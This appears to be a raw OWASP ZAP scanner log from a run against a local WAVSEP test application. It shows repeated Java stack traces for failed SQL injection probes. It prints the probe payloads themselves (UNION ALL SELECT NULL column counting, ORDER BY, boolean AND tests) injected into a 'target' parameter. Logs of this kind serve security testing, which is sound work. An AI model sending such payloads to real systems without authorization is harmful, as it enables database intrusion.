http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679788 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679789 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679789 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679790 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679791 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679793 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 7506#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 7506# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679793 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9325=6638 AND (7508=7508] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9325=6638 AND (7508=7508 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679794 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679795 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5559=5559 AND (9731=9731] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5559=5559 AND (9731=9731 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679796 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9325=6638 AND (7508=7508] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9325=6638 AND (7508=7508 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679796 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679797 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9507=6322] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9507=6322 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679797 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) 